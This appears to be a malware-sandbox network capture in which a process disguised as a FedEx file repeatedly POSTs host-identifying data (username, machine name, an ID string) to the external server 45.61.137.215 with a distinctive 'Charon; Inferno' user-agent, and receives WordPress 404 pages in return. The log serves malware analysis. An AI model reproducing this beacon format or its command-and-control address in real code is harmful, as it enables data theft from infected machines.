May 22, 2024 22:03:25.644638062 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 22, 2024 22:03:25.646816969 CEST	1236	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
May 22, 2024 22:03:25.647996902 CEST	1236	IN	Data Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
May 22, 2024 22:03:25.648010015 CEST	108	IN	Data Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
May 22, 2024 22:03:25.648019075 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 22, 2024 22:03:25.650299072 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	49743	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:03:25.799709082 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:03:25.848279953 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:03:29.346072912 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:03:26 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:03:29.346666098 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:03:29.347649097 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:03:29.348840952 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 22, 2024 22:03:29.348855019 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 22, 2024 22:03:29.351475000 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 22, 2024 22:03:29.352358103 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 22, 2024 22:03:29.352370977 CEST	1236	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 22, 2024 22:03:29.352380991 CEST	1236	IN	Data Raw: 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b Data Ascii: ar(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important
May 22, 2024 22:03:29.354609013 CEST	896	IN	Data Raw: 61 63 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 Data Ascii: ack-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	49744	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:03:29.494079113 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:03:29.545775890 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:03:32.748140097 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:03:30 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:03:32.748161077 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:03:32.748337030 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:03:32.748538971 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 22, 2024 22:03:32.748749971 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 22, 2024 22:03:32.748766899 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 22, 2024 22:03:32.749150038 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 22, 2024 22:03:32.749166965 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 22, 2024 22:03:32.749181032 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 22, 2024 22:03:32.752902985 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	49745	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:03:32.900181055 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:03:32.913181067 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:03:36.089167118 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:03:33 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:03:36.089694977 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:03:36.093080997 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
